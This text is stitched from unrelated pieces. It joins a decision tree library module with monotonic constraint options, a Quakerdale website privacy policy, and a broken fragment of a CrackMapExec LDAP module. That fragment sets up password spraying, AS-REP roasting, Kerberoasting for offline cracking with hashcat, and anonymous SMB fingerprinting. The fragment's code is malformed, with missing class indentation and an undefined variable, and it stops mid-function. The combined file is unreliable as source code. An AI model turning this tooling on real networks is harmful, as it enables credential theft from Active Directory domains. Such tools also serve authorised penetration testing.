                             ".shape = {})".format(X.shape,
                                                   X_idx_sorted.shape))

        # Build tree
        # A pre-built Criterion instance may be passed; otherwise look up the
        # Cython criterion class by name.
        criterion = self.criterion
        if not isinstance(criterion, Criterion):
            if is_classification:
                criterion = CRITERIA_CLF[self.criterion](self.n_outputs_,
                                                         self.n_classes_)
            else:
                criterion = CRITERIA_REG[self.criterion](self.n_outputs_,
                                                         n_samples)

        SPLITTERS = SPARSE_SPLITTERS if issparse(X) else DENSE_SPLITTERS

        def _encode_monotonic(increasing, decreasing):
            """Validate the increasing/decreasing feature-index lists and
            encode them into a single int32 array of length n_features_:
            +1 for increasing, -1 for decreasing, 0 for unconstrained."""
            if increasing is None: increasing = []
            if decreasing is None: decreasing = []

            def is_int_in_range(feature):
                return isinstance(feature, int) and 0 <= feature < self.n_features_

            def is_valid(features):
                return (isinstance(features, list) and
                        all(is_int_in_range(feature) for feature in features))

            if not is_valid(increasing):
                raise ValueError("increasing should be a list of ints in the range [0,n_features].")
            if not is_valid(decreasing):
                raise ValueError("decreasing should be a list of ints in the range [0,n_features].")

            # A feature cannot carry both constraints at once.
            if increasing and decreasing:
                intersection = set(increasing) & set(decreasing)
                if intersection:
                    raise ValueError("The following features cannot be both increasing and decreasing: " + str(list(intersection)))

            monotonic = np.zeros(self.n_features_, dtype=np.int32)
            if increasing:
                for feature in increasing:
                    monotonic[feature] = 1
            if decreasing:
                for feature in decreasing:
                    monotonic[feature] = -1
            return monotonic

        monotonic = _encode_monotonic(self.increasing, self.decreasing)

        splitter = self.splitter
        if not isinstance(self.splitter, Splitter):
            splitter = SPLITTERS[self.splitter](criterion,
                                                self.max_features_,
                                                min_samples_leaf,
                                                min_weight_leaf,
                                                random_state,
                                                self.presort,
                                                monotonic)

        self.tree_ = Tree(self.n_features_, self.n_classes_, self.n_outputs_)

        # Use BestFirst if max_leaf_nodes given; use DepthFirst otherwise
        if max_leaf_nodes < 0:
            builder = DepthFirstTreeBuilder(splitter, min_samples_split,
                                            min_samples_leaf,
                                            min_weight_leaf,
                                            max_depth, self.min_impurity_split)
        else:
            builder = BestFirstTreeBuilder(splitter, min_samples_split,
                                           min_samples_leaf,
                                           min_weight_leaf,
                                           max_depth,
                                           max_leaf_nodes, self.min_impurity_split)

        builder.build(self.tree_, X, y, sample_weight, X_idx_sorted)

        # For single-output problems, unwrap the per-output lists so the
        # public attributes are scalars/arrays rather than length-1 lists.
        if self.n_outputs_ == 1:
            self.n_classes_ = self.n_classes_[0]
            self.classes_ = self.classes_[0]

        return self

    def _validate_X_predict(self, X, check_input):
        """Validate X whenever one tries to predict, apply, predict_proba"""
        if self.tree_ is None:
            raise NotFittedError("Estimator not fitted, "
                                 "call `fit` before exploiting the model.")

        if check_input:
            X = check_array(X, dtype=DTYPE, accept_sparse="csr")
            # As in fit(): only 32-bit sparse indices are supported.
            if issparse(X) and (X.indices.dtype != np.intc or
                                X.indptr.dtype != np.intc):
                raise ValueError("No support for np.int64 index based "
                                 "sparse matrices")

        n_features = X.shape[1]
        if self.n_features_ != n_features:
            raise ValueError("Number of features of the model must "
                             "match the input. Model n_features is %s and "
                             "input n_features is %s "
                             % (self.n_features_, n_features))

        return X

    def predict(self, X, check_input=True):
        """Predict class or regression value for X.

        For a classification model, the predicted class for each sample in X is
        returned. For a regression model, the predicted value based on X is
        returned.

        Parameters
        ----------
        X : array-like or sparse matrix of shape = [n_samples, n_features]
            The input samples. Internally, it will be converted to
            ``dtype=np.float32`` and if a sparse matrix is provided
            to a sparse ``csr_matrix``.

        check_input : boolean, (default=True)
            Allow to bypass several input checking.
            Don't use this parameter unless you know what you do.

        Returns
        -------
        y : array of shape = [n_samples] or [n_samples, n_outputs]
            The predicted classes, or the predict values.
        """
        X = self._validate_X_predict(X, check_input)
        proba = self.tree_.predict(X)
        n_samples = X.shape[0]

        # Classification
        if isinstance(self, ClassifierMixin):
            if self.n_outputs_ == 1:
                # Map the argmax over class probabilities back to the
                # original class labels.
                return self.classes_.take(np.argmax(proba, axis=1), axis=0)

            else:
                predictions = np.zeros((n_samples, self.n_outputs_))

                for k in range(self.n_outputs_):
                    predictions[:, k] = self.classes_[k].take(
                        np.argmax(proba[:, k], axis=1),
                        axis=0)

                return predictions

        # Regression
        else:
            if self.n_outputs_ == 1:
                return proba[:, 0]

            else:
                return proba[:, :, 0]

    def apply(self, X, check_input=True):
        """
        Returns the index of the leaf that each sample is predicted as.

        .. versionadded:: 0.17

        Parameters
        ----------
        X : array_like or sparse matrix, shape = [n_samples, n_features]
            The input samples. Internally, it will be converted to
            ``dtype=np.float32`` and if a sparse matrix is provided
            to a sparse ``csr_matrix``.

        check_input : boolean, (default=True)
            Allow to bypass several input checking.
            Don't use this parameter unless you know what you do.

        Returns
        -------
        X_leaves : array_like, shape = [n_samples,]
            For each datapoint x in X, return the index of the leaf x
            ends up in. Leaves are numbered within
            ``[0; self.tree_.node_count)``, possibly with gaps in the
            numbering.
        """
        X = self._validate_X_predict(X, check_input)
        return self.tree_.apply(X)

    def decision_path(self, X, check_input=True):
        """Return the decision path in the tree

        Parameters
        ----------
        X : array_like or sparse matrix, shape = [n_samples, n_features]
            The input samples. Internally, it will be converted to
            ``dtype=np.float32`` and if a sparse matrix is provided
            to a sparse ``csr_matrix``.

        check_input : boolean, (default=True)
            Allow to bypass several input checking.
            Don't use this parameter unless you know what you do.

        Returns
        -------
        indicator : sparse csr array, shape = [n_samples, n_nodes]
            Return a node indicator matrix where non zero elements
            indicates that the samples goes through the nodes.
        """
        X = self._validate_X_predict(X, check_input)
        return self.tree_.decision_path(X)

    @property
    def feature_importances_(self):
        """Return the feature importances.

        The importance of a feature is computed as the (normalized) total
        reduction of the criterion brought by that feature.
        It is also known as the Gini importance.

        Returns
        -------
        feature_importances_ : array, shape = [n_features]
        """
        if self.tree_ is None:
            raise NotFittedError("Estimator not fitted, call `fit` before"
                                 " `feature_importances_`.")

        return self.tree_.compute_feature_importances()
# =============================================================================
# Public estimators
# =============================================================================
class DecisionTreeClassifier(BaseDecisionTree, ClassifierMixin):
    """A decision tree classifier.

    Read more in the :ref:`User Guide <tree>`.

    Parameters
    ----------
    criterion : string, optional (default="gini")
        The function to measure the quality of a split. Supported criteria are
        "gini" for the Gini impurity and "entropy" for the information gain.

    splitter : string, optional (default="best")
        The strategy used to choose the split at each node. Supported
        strategies are "best" to choose the best split and "random" to choose
        the best random split.

    max_features : int, float, string or None, optional (default=None)
        The number of features to consider when looking for the best split:

        - If int, then consider `max_features` features at each split.
        - If float, then `max_features` is a percentage and
          `int(max_features * n_features)` features are considered at each
          split.
        - If "auto", then `max_features=sqrt(n_features)`.
        - If "sqrt", then `max_features=sqrt(n_features)`.
        - If "log2", then `max_features=log2(n_features)`.
        - If None, then `max_features=n_features`.

        Note: the search for a split does not stop until at least one
        valid partition of the node samples is found, even if it requires to
        effectively inspect more than ``max_features`` features.

    max_depth : int or None, optional (default=None)
        The maximum depth of the tree. If None, then nodes are expanded until
        all leaves are pure or until all leaves contain less than
        min_samples_split samples.

    min_samples_split : int, float, optional (default=2)
        The minimum number of samples required to split an internal node:

        - If int, then consider `min_samples_split` as the minimum number.
        - If float, then `min_samples_split` is a percentage and
          `ceil(min_samples_split * n_samples)` are the minimum
          number of samples for each split.

    min_samples_leaf : int, float, optional (default=1)
        The minimum number of samples required to be at a leaf node:

        - If int, then consider `min_samples_leaf` as the minimum number.
        - If float, then `min_samples_leaf` is a percentage and
          `ceil(min_samples_leaf * n_samples)` are the minimum
          number of samples for each node.

    min_weight_fraction_leaf : float, optional (default=0.)
        The minimum weighted fraction of the input samples required to be at a
        leaf node.

    max_leaf_nodes : int or None, optional (default=None)
        Grow a tree with ``max_leaf_nodes`` in best-first fashion.
        Best nodes are defined as relative reduction in impurity.
        If None then unlimited number of leaf nodes.

    class_weight : dict, list of dicts, "balanced" or None, optional (default=None)
        Weights associated with classes in the form ``{class_label: weight}``.
        If not given, all classes are supposed to have weight one. For
        multi-output problems, a list of dicts can be provided in the same
        order as the columns of y.

        The "balanced" mode uses the values of y to automatically adjust
        weights inversely proportional to class frequencies in the input data
        as ``n_samples / (n_classes * np.bincount(y))``

        For multi-output, the weights of each column of y will be multiplied.

        Note that these weights will be multiplied with sample_weight (passed
        through the fit method) if sample_weight is specified.

    random_state : int, RandomState instance or None, optional (default=None)
        If int, random_state is the seed used by the random number generator;
        If RandomState instance, random_state is the random number generator;
        If None, the random number generator is the RandomState instance used
        by `np.random`.

    min_impurity_split : float, optional (default=1e-7)
        Threshold for early stopping in tree growth. A node will split
        if its impurity is above the threshold, otherwise it is a leaf.

        .. versionadded:: 0.18

    presort : bool, optional (default=False)
        Whether to presort the data to speed up the finding of best splits in
        fitting. For the default settings of a decision tree on large
        datasets, setting this to true may slow down the training process.
        When using either a smaller dataset or a restricted depth, this may
        speed up the training.

    increasing : list of ints, optional (default=None)
        Indices of features to have a monotonically increasing effect.

    decreasing : list of ints, optional (default=None)
        Indices of features to have a monotonically decreasing effect.

    Attributes
    ----------
    classes_ : array of shape = [n_classes] or a list of such arrays
        The classes labels (single output problem),
        or a list of arrays of class labels (multi-output problem).

    feature_importances_ : array of shape = [n_features]
        The feature importances. The higher, the more important the
        feature. The importance of a feature is computed as the (normalized)
        total reduction of the criterion brought by that feature. It is also
        known as the Gini importance [4]_.

    max_features_ : int,
        The inferred value of max_features.

    n_classes_ : int or list
        The number of classes (for single output problems),
        or a list containing the number of classes for each
        output (for multi-output problems).

    n_features_ : int
        The number of features when ``fit`` is performed.

    n_outputs_ : int
        The number of outputs when ``fit`` is performed.

    tree_ : Tree object
        The underlying Tree object.

    See also
    --------
    DecisionTreeRegressor

    References
    ----------
    .. [1] https://en.wikipedia.org/wiki/Decision_tree_learning

    .. [2] L. Breiman, J. Friedman, R. Olshen, and C. Stone, "Classification
           and Regression Trees", Wadsworth, Belmont, CA, 1984.

    .. [3] T. Hastie, R. Tibshirani and J. Friedman. "Elements of Statistical
           Learning", Springer, 2009.

    .. [4] L. Breiman, and A. Cutler, "Random Forests",
           http://www.stat.berkeley.edu/~breiman/RandomForests/cc_home.htm

    Examples
    --------
    >>> from sklearn.datasets import load_iris
    >>> from sklearn.model_selection import cross_val_score
    >>> from sklearn.tree import DecisionTreeClassifier
    >>> clf = DecisionTreeClassifier(random_state=0)
    >>> iris = load_iris()
    >>> cross_val_score(clf, iris.data, iris.target, cv=10)
    ... # doctest: +SKIP
    ...
    array([ 1.     ,  0.93...,  0.86...,  0.93...,  0.93...,
            0.93...,  0.93...,  1.     ,  0.93...,  1.      ])
    """

    def __init__(self,
                 criterion="gini",
                 splitter="best",
                 max_depth=None,
                 min_samples_split=2,
                 min_samples_leaf=1,
                 min_weight_fraction_leaf=0.,
                 max_features=None,
                 random_state=None,
                 max_leaf_nodes=None,
                 min_impurity_split=1e-7,
                 class_weight=None,
                 presort=False,
                 increasing=None,
                 decreasing=None):
        # All parameter storage and fit-time validation is delegated to
        # BaseDecisionTree; this subclass only fixes the defaults.
        super(DecisionTreeClassifier, self).__init__(
            criterion=criterion,
            splitter=splitter,
            max_depth=max_depth,
            min_samples_split=min_samples_split,
            min_samples_leaf=min_samples_leaf,
            min_weight_fraction_leaf=min_weight_fraction_leaf,
            max_features=max_features,
            max_leaf_nodes=max_leaf_nodes,
            class_weight=class_weight,
            random_state=random_state,
            min_impurity_split=min_impurity_split,
            presort=presort,
            increasing=increasing,
            decreasing=decreasing)

    def predict_proba(self, X, check_input=True):
        """Predict class probabilities of the input samples X.

        The predicted class probability is the fraction of samples of the same
        class in a leaf.

        Parameters
        ----------
        X : array-like or sparse matrix of shape = [n_samples, n_features]
            The input samples. Internally, it will be converted to
            ``dtype=np.float32`` and if a sparse matrix is provided
            to a sparse ``csr_matrix``.
        check_input : boolean, (default=True)
            Allow to bypass several input checking.
            Don't use this parameter unless you know what you do.

        Returns
        -------
        p : array of shape = [n_samples, n_classes], or a list of n_outputs
            such arrays if n_outputs > 1.
            The class probabilities of the input samples. The order of the
            classes corresponds to that in the attribute `classes_`.
        """
        X = self._validate_X_predict(X, check_input)
        proba = self.tree_.predict(X)

        if self.n_outputs_ == 1:
            proba = proba[:, :self.n_classes_]
            normalizer = proba.sum(axis=1)[:, np.newaxis]
            # Guard against division by zero: rows summing to zero are
            # left as all-zero probability vectors.
            normalizer[normalizer == 0.0] = 1.0
            proba /= normalizer

            return proba

        else:
            all_proba = []

            for k in range(self.n_outputs_):
                proba_k = proba[:, k, :self.n_classes_[k]]
                normalizer = proba_k.sum(axis=1)[:, np.newaxis]
                # Same zero-sum guard as in the single-output branch.
                normalizer[normalizer == 0.0] = 1.0
                proba_k /= normalizer
                all_proba.append(proba_k)

            return all_proba

    def predict_log_proba(self, X):
        """Predict class log-probabilities of the input samples X.

        Parameters
        ----------
        X : array-like or sparse matrix of shape = [n_samples, n_features]
            The input samples. Internally, it will be converted to
            ``dtype=np.float32`` and if a sparse matrix is provided
            to a sparse ``csr_matrix``.

        Returns
        -------
        p : array of shape = [n_samples, n_classes], or a list of n_outputs
            such arrays if n_outputs > 1.
            The class log-probabilities of the input samples. The order of the
            classes corresponds to that in the attribute `classes_`.
        """
        # NOTE(review): classes with zero predicted probability map to -inf
        # here (NumPy emits a divide-by-zero warning) — confirm callers accept
        # that, as no clipping is applied.
        proba = self.predict_proba(X)

        if self.n_outputs_ == 1:
            return np.log(proba)

        else:
            for k in range(self.n_outputs_):
                proba[k] = np.log(proba[k])

            return proba
class DecisionTreeRegressor(BaseDecisionTree, RegressorMixin):
    """A decision tree regressor.

    Read more in the :ref:`User Guide <tree>`.

    Parameters
    ----------
    criterion : string, optional (default="mse")
        The function to measure the quality of a split. Supported criteria
        are "mse" for the mean squared error, which is equal to variance
        reduction as feature selection criterion, and "mae" for the mean
        absolute error.

        .. versionadded:: 0.18
           Mean Absolute Error (MAE) criterion.

    splitter : string, optional (default="best")
        The strategy used to choose the split at each node. Supported
        strategies are "best" to choose the best split and "random" to choose
        the best random split.

    max_features : int, float, string or None, optional (default=None)
        The number of features to consider when looking for the best split:

        - If int, then consider `max_features` features at each split.
        - If float, then `max_features` is a percentage and
          `int(max_features * n_features)` features are considered at each
          split.
        - If "auto", then `max_features=n_features`.
        - If "sqrt", then `max_features=sqrt(n_features)`.
        - If "log2", then `max_features=log2(n_features)`.
        - If None, then `max_features=n_features`.

        Note: the search for a split does not stop until at least one
        valid partition of the node samples is found, even if it requires to
        effectively inspect more than ``max_features`` features.

    max_depth : int or None, optional (default=None)
        The maximum depth of the tree. If None, then nodes are expanded until
        all leaves are pure or until all leaves contain less than
        min_samples_split samples.

    min_samples_split : int, float, optional (default=2)
        The minimum number of samples required to split an internal node:

        - If int, then consider `min_samples_split` as the minimum number.
        - If float, then `min_samples_split` is a percentage and
          `ceil(min_samples_split * n_samples)` are the minimum
          number of samples for each split.

    min_samples_leaf : int, float, optional (default=1)
        The minimum number of samples required to be at a leaf node:

        - If int, then consider `min_samples_leaf` as the minimum number.
        - If float, then `min_samples_leaf` is a percentage and
          `ceil(min_samples_leaf * n_samples)` are the minimum
          number of samples for each node.

    min_weight_fraction_leaf : float, optional (default=0.)
        The minimum weighted fraction of the input samples required to be at a
        leaf node.

    max_leaf_nodes : int or None, optional (default=None)
        Grow a tree with ``max_leaf_nodes`` in best-first fashion.
        Best nodes are defined as relative reduction in impurity.
        If None then unlimited number of leaf nodes.

    random_state : int, RandomState instance or None, optional (default=None)
        If int, random_state is the seed used by the random number generator;
        If RandomState instance, random_state is the random number generator;
        If None, the random number generator is the RandomState instance used
        by `np.random`.

    min_impurity_split : float, optional (default=1e-7)
        Threshold for early stopping in tree growth. If the impurity
        of a node is below the threshold, the node is a leaf.

        .. versionadded:: 0.18

    presort : bool, optional (default=False)
        Whether to presort the data to speed up the finding of best splits in
        fitting. For the default settings of a decision tree on large
        datasets, setting this to true may slow down the training process.
        When using either a smaller dataset or a restricted depth, this may
        speed up the training.

    increasing : list of ints, optional (default=None)
        Indices of features to have a monotonically increasing effect.

    decreasing : list of ints, optional (default=None)
        Indices of features to have a monotonically decreasing effect.

    Attributes
    ----------
    feature_importances_ : array of shape = [n_features]
        The feature importances.
        The higher, the more important the feature.
        The importance of a feature is computed as the
        (normalized) total reduction of the criterion brought
        by that feature. It is also known as the Gini importance [4]_.

    max_features_ : int,
        The inferred value of max_features.

    n_features_ : int
        The number of features when ``fit`` is performed.

    n_outputs_ : int
        The number of outputs when ``fit`` is performed.

    tree_ : Tree object
        The underlying Tree object.

    See also
    --------
    DecisionTreeClassifier

    References
    ----------
    .. [1] https://en.wikipedia.org/wiki/Decision_tree_learning

    .. [2] L. Breiman, J. Friedman, R. Olshen, and C. Stone, "Classification
           and Regression Trees", Wadsworth, Belmont, CA, 1984.

    .. [3] T. Hastie, R. Tibshirani and J. Friedman. "Elements of Statistical
           Learning", Springer, 2009.

    .. [4] L. Breiman, and A. Cutler, "Random Forests",
           http://www.stat.berkeley.edu/~breiman/RandomForests/cc_home.htm

    Examples
    --------
    >>> from sklearn.datasets import load_boston
    >>> from sklearn.model_selection import cross_val_score
    >>> from sklearn.tree import DecisionTreeRegressor
    >>> boston = load_boston()
    >>> regressor = DecisionTreeRegressor(random_state=0)
    >>> cross_val_score(regressor, boston.data, boston.target, cv=10)
    ... # doctest: +SKIP
    ...
    array([ 0.61...,  0.57..., -0.34...,  0.41...,  0.75...,
            0.07...,  0.29...,  0.33..., -1.42..., -1.77...])
    """

    def __init__(self,
                 criterion="mse",
                 splitter="best",
                 max_depth=None,
                 min_samples_split=2,
                 min_samples_leaf=1,
                 min_weight_fraction_leaf=0.,
                 max_features=None,
                 random_state=None,
                 max_leaf_nodes=None,
                 min_impurity_split=1e-7,
                 presort=False,
                 increasing=None,
                 decreasing=None):
        # Pure pass-through constructor: parameter storage and validation
        # happen in BaseDecisionTree (note: no class_weight for regression).
        super(DecisionTreeRegressor, self).__init__(
            criterion=criterion,
            splitter=splitter,
            max_depth=max_depth,
            min_samples_split=min_samples_split,
            min_samples_leaf=min_samples_leaf,
            min_weight_fraction_leaf=min_weight_fraction_leaf,
            max_features=max_features,
            max_leaf_nodes=max_leaf_nodes,
            random_state=random_state,
            min_impurity_split=min_impurity_split,
            presort=presort,
            increasing=increasing,
            decreasing=decreasing)
class ExtraTreeClassifier(DecisionTreeClassifier):
    """An extremely randomized tree classifier.

    Extra-trees are grown differently from classic decision trees: instead
    of searching for the single best threshold at each node, one random
    split is drawn for each of the `max_features` randomly selected
    features, and the best of those random splits is kept. With
    `max_features` set to 1 the tree is built completely at random.

    Warning: Extra-trees should only be used within ensemble methods.

    Read more in the :ref:`User Guide <tree>`.

    See also
    --------
    ExtraTreeRegressor, ExtraTreesClassifier, ExtraTreesRegressor

    References
    ----------
    .. [1] P. Geurts, D. Ernst., and L. Wehenkel, "Extremely randomized trees",
           Machine Learning, 63(1), 3-42, 2006.
    """

    def __init__(self,
                 criterion="gini",
                 splitter="random",
                 max_depth=None,
                 min_samples_split=2,
                 min_samples_leaf=1,
                 min_weight_fraction_leaf=0.,
                 max_features="auto",
                 random_state=None,
                 max_leaf_nodes=None,
                 min_impurity_split=1e-7,
                 class_weight=None,
                 increasing=None,
                 decreasing=None):
        # Only the defaults differ from DecisionTreeClassifier
        # (random splitter, max_features="auto"); everything is forwarded.
        params = dict(
            criterion=criterion,
            splitter=splitter,
            max_depth=max_depth,
            min_samples_split=min_samples_split,
            min_samples_leaf=min_samples_leaf,
            min_weight_fraction_leaf=min_weight_fraction_leaf,
            max_features=max_features,
            max_leaf_nodes=max_leaf_nodes,
            class_weight=class_weight,
            min_impurity_split=min_impurity_split,
            random_state=random_state,
            increasing=increasing,
            decreasing=decreasing)
        super(ExtraTreeClassifier, self).__init__(**params)
class ExtraTreeRegressor(DecisionTreeRegressor):
    """An extremely randomized tree regressor.

    Extra-trees are grown differently from classic decision trees: instead
    of searching for the single best threshold at each node, one random
    split is drawn for each of the `max_features` randomly selected
    features, and the best of those random splits is kept. With
    `max_features` set to 1 the tree is built completely at random.

    Warning: Extra-trees should only be used within ensemble methods.

    Read more in the :ref:`User Guide <tree>`.

    See also
    --------
    ExtraTreeClassifier, ExtraTreesClassifier, ExtraTreesRegressor

    References
    ----------
    .. [1] P. Geurts, D. Ernst., and L. Wehenkel, "Extremely randomized trees",
           Machine Learning, 63(1), 3-42, 2006.
    """

    def __init__(self,
                 criterion="mse",
                 splitter="random",
                 max_depth=None,
                 min_samples_split=2,
                 min_samples_leaf=1,
                 min_weight_fraction_leaf=0.,
                 max_features="auto",
                 random_state=None,
                 min_impurity_split=1e-7,
                 max_leaf_nodes=None,
                 increasing=None,
                 decreasing=None):
        # Only the defaults differ from DecisionTreeRegressor
        # (random splitter, max_features="auto"); everything is forwarded.
        params = dict(
            criterion=criterion,
            splitter=splitter,
            max_depth=max_depth,
            min_samples_split=min_samples_split,
            min_samples_leaf=min_samples_leaf,
            min_weight_fraction_leaf=min_weight_fraction_leaf,
            max_features=max_features,
            max_leaf_nodes=max_leaf_nodes,
            min_impurity_split=min_impurity_split,
            random_state=random_state,
            increasing=increasing,
            decreasing=decreasing)
        super(ExtraTreeRegressor, self).__init__(**params)
|
This web site is owned and operated by White’s Iowa Institute dba Quakerdale (hereafter referred to as Quakerdale). We respect the privacy of every individual who visits our site. We do not collect personally identifiable information from individuals unless they provide it to us voluntarily and knowingly. If you register to use various features of our site, we use the information you supply for the purpose of providing the services you have requested. We may also contact you from time to time with information that relates to your requests or interests.
Quakerdale collects two types of information: personal voluntary registration information, such as name and e-mail address, and non-personal statistical information, such as site traffic and usage patterns. This information is used primarily to deliver requested information and to improve the design and structure of the site. It is used solely by Quakerdale and others involved in the operation of this web site and will never be sold or given to third parties.
To protect your privacy, we use encryption technologies. In addition, we allow only authorized employees or agents to have access to personal information. Although we cannot guarantee there will be no unauthorized access to personal information, these measures increase the security and privacy of information traveling to, from, and within our web site.
|
# from https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py
# https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
import requests
import logging
import configparser
from cme.connection import *
from cme.helpers.logger import highlight
from cme.logger import CMEAdapter
from cme.protocols.ldap.kerberos import KerberosAttacks
from impacket.smbconnection import SMBConnection, SessionError
from impacket.smb import SMB_DIALECT
from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_DONT_REQUIRE_PREAUTH, UF_TRUSTED_FOR_DELEGATION, UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION
from impacket.krb5.kerberosv5 import sendReceive, KerberosError, getKerberosTGT, getKerberosTGS
from impacket.krb5.types import KerberosTime, Principal
from impacket.ldap import ldap as ldap_impacket
from impacket.krb5 import constants
from impacket.ldap import ldapasn1 as ldapasn1_impacket
from io import StringIO
class ldap(connection):
def __init__(self, args, db, host):
    """Initialise default per-target LDAP state, then run the generic bootstrap."""
    # --- target / session identity, filled in during enumeration ---
    self.domain = None
    self.server_os = None
    self.os_arch = 0
    self.signing = False
    self.smbv1 = None
    # --- credential material ---
    self.hash = None
    self.lmhash = ''
    self.nthash = ''
    self.admin_privs = False
    # --- LDAP handle, loot and bookkeeping ---
    self.ldapConnection = None
    self.baseDN = ''
    self.remote_ops = None
    self.bootkey = None
    self.output_filename = None
    self.smb_share_name = smb_share_name
    # The base class drives target connection and authentication.
    connection.__init__(self, args, db, host)
@staticmethod
def proto_args(parser, std_parser, module_parser):
    """Register the 'ldap' sub-command and its options on the CME CLI parser.

    Parameters
    ----------
    parser : the sub-parsers object protocols register themselves on.
    std_parser, module_parser : parent parsers carrying the shared options.

    Returns
    -------
    The top-level parser (for chaining).
    """
    ldap_parser = parser.add_parser('ldap', help="own stuff using ldap", parents=[std_parser, module_parser])
    ldap_parser.add_argument("-H", '--hash', metavar="HASH", dest='hash', nargs='+', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes')
    # Help-text fix: closing parenthesis was missing.
    ldap_parser.add_argument("--no-bruteforce", action='store_true', help='No spray when using file for username and password (user1 => password1, user2 => password2)')
    ldap_parser.add_argument("--continue-on-success", action='store_true', help="continues authentication attempts even after successes")
    ldap_parser.add_argument("--port", type=int, choices={389, 636}, default=389, help="LDAP port (default: 389)")

    dgroup = ldap_parser.add_mutually_exclusive_group()
    dgroup.add_argument("-d", metavar="DOMAIN", dest='domain', type=str, default=None, help="domain to authenticate to")
    dgroup.add_argument("--local-auth", action='store_true', help='authenticate locally to each target')

    # Typo fix: "Retrevie" -> "Retrieve".
    egroup = ldap_parser.add_argument_group("Retrieve hash on the remote DC", "Options to get hashes from Kerberos")
    egroup.add_argument("--asreproast", help="Get AS_REP response ready to crack with hashcat")
    egroup.add_argument("--kerberoasting", help='Get TGS ticket ready to crack with hashcat')

    # Typo fixes: "to to" -> "to", "objets that had" -> "objects that have".
    vgroup = ldap_parser.add_argument_group("Retrieve useful information on the domain", "Options to play with Kerberos")
    vgroup.add_argument("--trusted-for-delegation", action="store_true", help="Get the list of users and computers with flag TRUSTED_FOR_DELEGATION")
    vgroup.add_argument("--password-not-required", action="store_true", help="Get the list of users with flag PASSWD_NOTREQD")
    vgroup.add_argument("--admin-count", action="store_true", help="Get objects that have the value adminCount=1")
    vgroup.add_argument("--users", action="store_true", help="Enumerate domain users")
    vgroup.add_argument("--groups", action="store_true", help="Enumerate domain groups")

    return parser
def proto_logger(self):
    """Attach a CME logging adapter tagged with this connection's context."""
    context = {
        'protocol': 'LDAP',
        'host': self.host,
        'port': self.args.port,
        'hostname': self.hostname,
    }
    self.logger = CMEAdapter(extra=context)
def get_os_arch(self):
    """Determine whether the target OS is 32- or 64-bit.

    Binds to the remote MSRPC endpoint mapper (port 135) requesting the
    64-bit NDR transfer syntax; a 'syntaxes_not_supported' rejection
    indicates a 32-bit host.

    Returns
    -------
    int
        64 or 32 on success, 0 if detection failed.
    """
    try:
        stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host)
        transport = DCERPCTransportFactory(stringBinding)
        transport.set_connect_timeout(5)
        dce = transport.get_dce_rpc()
        if self.args.kerberos:
            dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
        dce.connect()
        try:
            dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))
        except DCERPCException as e:
            # BUG FIX: was "except (DCERPCException, e):", which raised a
            # NameError ('e' is undefined) instead of catching the exception.
            if str(e).find('syntaxes_not_supported') >= 0:
                dce.disconnect()
                return 32
        else:
            dce.disconnect()
            return 64
    except Exception as e:
        logging.debug('Error retrieving os arch of {}: {}'.format(self.host, str(e)))

    return 0
def enum_host_info(self):
    """Fingerprint the target over SMB: hostname, domain, OS, signing, arch."""
    # Our own IP as seen on the already-open SMB socket.
    self.local_ip = self.conn.getSMBServer().get_socket().getsockname()[0]
    try:
        # Anonymous (null-session) login; the identity fields read below are
        # available even when the login itself is rejected.
        self.conn.login('' , '')
    except:
        #if "STATUS_ACCESS_DENIED" in e:
        pass
    self.domain = self.conn.getServerDNSDomainName()
    self.hostname = self.conn.getServerName()
    self.server_os = self.conn.getServerOS()
    # SMBv1 and SMBv2+ expose the signing requirement through different APIs.
    self.signing = self.conn.isSigningRequired() if self.smbv1 else self.conn._SMBConnection._Connection['RequireSigning']
    self.os_arch = self.get_os_arch()
    self.output_filename = os.path.expanduser('~/.cme/logs/{}_{}_{}'.format(self.hostname, self.host, datetime.now().strftime("%Y-%m-%d_%H%M%S")))
    # Workgroup machines report an empty DNS domain; fall back to the hostname.
    if not self.domain:
        self.domain = self.hostname
    try:
        '''plaintext_login
            DC's seem to want us to logoff first, windows workstations sometimes reset the connection
            (go home Windows, you're drunk)
        '''
        self.conn.logoff()
    except:
        pass
    # Explicit CLI choices override whatever the server reported.
    if self.args.domain:
        self.domain = self.args.domain
    if self.args.local_auth:
        self.domain = self.hostname
    #Re-connect since we logged off
    self.create_conn_obj()
def print_host_info(self):
    """Log a one-line summary of the remote host's fingerprint."""
    arch = ' x{}'.format(self.os_arch) if self.os_arch else ''
    summary = u"{}{} (name:{}) (domain:{}) (signing:{}) (SMBv1:{})".format(
        self.server_os, arch, self.hostname, self.domain, self.signing, self.smbv1)
    self.logger.info(summary)
def kerberos_login(self, aesKey, kdcHost):
    """Bind to LDAP using Kerberos credentials, retrying over LDAPS if required.

    NOTE(review): the aesKey/kdcHost parameters are never read — the method
    uses self.aesKey/self.kdcHost instead; confirm the base class sets those
    attributes before calling.
    """
    # Derive the LDAP search base from the DNS domain (foo.bar -> dc=foo,dc=bar).
    self.baseDN = ','.join('dc=%s' % part for part in self.domain.split('.'))

    target = self.kdcHost if self.kdcHost is not None else self.domain

    try:
        self.ldapConnection.kerberosLogin(self.username, self.password, self.domain,
                                          self.lmhash, self.nthash, self.aesKey,
                                          kdcHost=self.kdcHost)
    except ldap_impacket.LDAPSessionError as e:
        if str(e).find('strongerAuthRequired') >= 0:
            # The server demands a sealed channel -- retry over LDAPS.
            self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)
            self.ldapConnection.kerberosLogin(self.username, self.password, self.domain,
                                              self.lmhash, self.nthash, self.aesKey,
                                              kdcHost=self.kdcHost)
    return True
def plaintext_login(self, domain, username, password):
    """Authenticate to LDAP with a cleartext password.

    Falls back to LDAPS when the server requires stronger auth; with an
    empty password and --asreproast, attempts AS-REP roasting instead.

    Returns
    -------
    bool or None
        True on success (None when --continue-on-success), False on failure.
    """
    self.username = username
    self.password = password
    self.domain = domain

    # Build the search base from the domain name (foo.bar -> dc=foo,dc=bar).
    self.baseDN = ''
    domainParts = self.domain.split('.')
    for i in domainParts:
        self.baseDN += 'dc=%s,' % i
